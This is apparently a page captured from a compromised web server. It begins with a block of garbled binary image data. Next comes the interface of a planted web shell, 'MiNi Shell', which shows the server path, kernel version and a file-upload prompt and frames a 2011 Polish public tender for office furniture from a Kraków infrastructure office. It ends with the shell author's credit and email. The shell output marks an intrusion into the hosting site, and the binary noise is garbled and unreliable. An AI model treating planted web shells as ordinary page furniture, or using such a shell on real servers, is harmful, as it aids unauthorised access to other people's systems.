JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/343178-N-2011.html

<p class="kh_header"><b>Kraków: Dostawa mebli</b><br>
<b>Numer ogłoszenia: 343178 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Mogilska 85, 30-901 Kraków, woj. małopolskie, tel. 012 4551297, faks 012 4551306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rzikrakow.internetdsl.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli realizowana w ramach dwóch zadań:
Zadanie nr 1
Meble biurowe i mieszkaniowe: 
I.
1. biurko z szafkami i szufladą wiśnia					            84 szt.
2. stolik pod telefon wiśnia						                        29 szt.
3. szafa biurowa wiśnia								70 szt.
4. regał biurowy witryna wiśnia						            56 szt.
5. regał biurowy barek wiśnia						            51 szt.
6. szafa ubraniowa 2-drzwiowa wiśnia zw.				              	53 szt.
7. stolik pod komputer zw.	wiśnia					                        88 szt.
8. stolik pod drukarkę wiśnia						              	57 szt.
9. krzesło biurowe wyściełane drewniane wiśnia				  	119 szt.
10. stół konferencyjny wiśnia						            8 szt.
11. stolik okolicznościowy ława wiśnia						 3 szt.
12. fotel klubowy (finka) wiśnia							 15 szt.
13. stolik p. RTV wiśnia								 9 szt.  
14. kanapa wersalka wiśnia							      	 8 szt.
15. szafka kuchenna wisząca wiśnia						     	 3 szt.
16. szafka kuchenna stojąca wiśnia						     	 3 szt.
17. szafka kuchenna p. zlewozmywak wiśnia					 1 szt.
II. Zestawy biurowe w kolorze - jabłoń locarno
1. biurko jabłoń locarno								 3 szt.               
2. kontener do biurka jabłoń locarno						       	3 szt.           
3. łącznik do biurka jabłoń locarno					                 	3 szt.
4. stolik pod drukarkę jabłoń locarno					            3 szt.
5. szafa ubraniowa jabłoń locarno					                 	3 szt.
6. krzesło wyściełane jabłoń locarno					               	18 szt.
7. regał biurowy barek jabłoń locarno						3 szt.
8. regał biurowy witryna przeszklona jabłoń locarno       			      	 3 szt.
9. stolik pod komputer jabłoń locarno						3 szt.
10. stół konferencyjny  jabłoń locarno						3 szt.
11. stolik okolicznościowy ława jabłoń locarno					3 szt.
12. stolik pod telefon jabłoń locarno						       	3 szt.
13. fotel klubowy jabłoń locarno							6 szt.
14. wieszak do ubrań wielokołkowy ścienny			  	           	3 szt.
15. stolik pod RTV						                		3 szt.
Zadanie nr 2
Meble metalowe i na metalowej podstawie	
1.krzesło biurowe wyścielane na mp. ISO						265 szt.
2. krzesło obrotowe na mp. wyściełane						130 szt.
3. biurko na metalowej podstawie wiśnia					  	20 szt.
4. fotel biurowy obrotowy na mp.							36 szt.
5. stół kasynowy, klubowy, świetlicowy na mp. różny wiśnia			15 szt.
6. szafa metalowa na odzież								276 szt.
7. stół szkolny akademicki na mp. Wiśnia						38 szt.

Szczegółowy zakres i warunki realizacji robót przedstawiają:
opis przedmiotu zamówienia - zadanie nr 1,
opis przedmiotu zamówienia - zadanie nr 2,
dokument gwarancyjny - zadanie nr 1,
dokument gwarancyjny - zadanie nr 2,
wykaz miejsc dostawy - zadanie nr 1,
wykaz miejsc dostawy - zadanie nr 2,
druk Wycena ofertowa - zadanie nr 1,
druk Wycena ofertowa - zadanie nr 2,
wzór protokołu przyjęcia-przekazania sprzętu kwaterunkowego dla zadania nr 1 i 2
wzór umowy dla zadania nr 1 i 2.
Ww. dokumenty stanowią załączniki do specyfikacji istotnych warunków zamówienia 
i są jej integralną częścią..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1
3.500,00 zł (słownie: trzy tysiące pięćset złotych)
Zadanie nr 2
4.100,00 zł (słownie: cztery tysiące sto złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 i 2
Zamawiający uzna, iż wykonawca spełnia powyższy warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę mebli na kwotę co najmniej 50 tys. zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony, opieczętowany i podpisany przez osoby upoważnione druk Oferta;
Druk  Wycena ofertowa - odpowiedni dla konkretnego zadania 
Wykaz części zamówienia, której wykonanie powierzy podwykonawcom lub oświadczenie wykonawcy, że wykona zadanie własnymi siłami - w przypadku niewypełnienia lub niedołączenia ww. dokumentu do oferty, Zamawiający uzna, że wykonawca wykona zadanie własnymi siłami.
W zakresie potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy dołączyć:

1. Dla krzesła biurowego wyściełanego na metalowej podstawie WP 1 -37:
a)	ważny certyfikat ISO 9001- dla producenta,
b)	atest higieniczny,
c)	atest trudnopalności EN 1021:1:2,
d)	atest ścieralności na poziomie 150 000 cykli,
e)	atest potwierdzający zgodność produktu z normą EN 13761 (wymiary, bezpieczeństwo, stabilność i wytrzymałość)

2. Dla krzesła biurowego wyściełanego na metalowej podstawie WP 1 - 16:
a)	ważny certyfikat ISO 9001- dla producenta,
b)	atest higieniczny,
c)	atest trudnopalności EN 1021:1:2,
d)	atest ścieralności na poziomie 150 000 cykli,
e)	atest potwierdzający zgodność produktu z normą EN 1335:1:2:3 (wymiary, bezpieczeństwo, stabilność i wytrzymałość)

3. Dla fotelu obrotowego na metalowej podstawie WP 1 - 5 (zadanie nr 2 - opis przedmiotu zamówienia, pozycja 4) 
a)	ważny certyfikat ISO 9001- dla producenta,
b)	atest higieniczny,
c)	atest trudnopalności EN 1021:1:2 dla krzesła tapicerowanego tkaniną,
d)	atest ścieralności na poziomie 150 000 cykli,
e)	atest potwierdzający zgodność produktu z normą EN 1335:1:2:3 (wymiary, bezpieczeństwo, stabilność i wytrzymałość)

4.. Dla fotelu obrotowego na metalowej podstawie WP 1 - 5 (zadanie nr 2 - opis przedmiotu zamówienia, pozycja 5) 
f)	ważny certyfikat ISO 9001- dla producenta,
g)	atest higieniczny,
h)	atest trudnopalności EN 1021:1:2 dla krzesła tapicerowanego tkaniną,
i)	atest ścieralności na poziomie 50 000 cykli,
j)	atest potwierdzający zgodność produktu z normą EN 1335:1:2:3 (wymiary, bezpieczeństwo, stabilność i wytrzymałość)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.rzikrakow.internetdsl.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, 30-901 Kraków, 
ul. Mogilska 85.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 10:30, miejsce: Rejonowy Zarząd Infrastruktury, 30-901 Kraków, 
ul. Mogilska 85, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 25.11.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Meble biurowe i mieszkaniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1
Meble biurowe i mieszkaniowe: 
I.
1. biurko z szafkami i szufladą wiśnia					            84 szt.
2. stolik pod telefon wiśnia						                        29 szt.
3. szafa biurowa wiśnia								70 szt.
4. regał biurowy witryna wiśnia						            56 szt.
5. regał biurowy barek wiśnia						            51 szt.
6. szafa ubraniowa 2-drzwiowa wiśnia zw.				              	53 szt.
7. stolik pod komputer zw.	wiśnia					                        88 szt.
8. stolik pod drukarkę wiśnia						              	57 szt.
9. krzesło biurowe wyściełane drewniane wiśnia				  	119 szt.
10. stół konferencyjny wiśnia						            8 szt.
11. stolik okolicznościowy ława wiśnia						 3 szt.
12. fotel klubowy (finka) wiśnia							 15 szt.
13. stolik p. RTV wiśnia								 9 szt.  
14. kanapa wersalka wiśnia							      	 8 szt.
15. szafka kuchenna wisząca wiśnia						     	 3 szt.
16. szafka kuchenna stojąca wiśnia						     	 3 szt.
17. szafka kuchenna p. zlewozmywak wiśnia					 1 szt.

II. Zestawy biurowe w kolorze - jabłoń locarno
1. biurko jabłoń locarno								 3 szt.               
2. kontener do biurka jabłoń locarno						       	3 szt.           
3. łącznik do biurka jabłoń locarno					                 	3 szt.
4. stolik pod drukarkę jabłoń locarno					            3 szt.
5. szafa ubraniowa jabłoń locarno					                 	3 szt.
6. krzesło wyściełane jabłoń locarno					               	18 szt.
7. regał biurowy barek jabłoń locarno						3 szt.
8. regał biurowy witryna przeszklona jabłoń locarno       			      	 3 szt.
9. stolik pod komputer jabłoń locarno						3 szt.
10. stół konferencyjny  jabłoń locarno						3 szt.
11. stolik okolicznościowy ława jabłoń locarno					3 szt.
12. stolik pod telefon jabłoń locarno						       	3 szt.
13. fotel klubowy jabłoń locarno							6 szt.
14. wieszak do ubrań wielokołkowy ścienny			  	           	3 szt.
15. stolik pod RTV						                		3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2
Meble metalowe i na metalowej podstawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
Meble metalowe i na metalowej podstawie	
1.krzesło biurowe wyścielane na mp. ISO						265 szt.
2. krzesło obrotowe na mp. wyściełane						130 szt.
3. biurko na metalowej podstawie wiśnia					  	20 szt.
4. fotel biurowy obrotowy na mp.							36 szt.
5. stół kasynowy, klubowy, świetlicowy na mp. różny wiśnia			15 szt.
6. szafa metalowa na odzież								276 szt.
7. stół szkolny akademicki na mp. Wiśnia						38 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com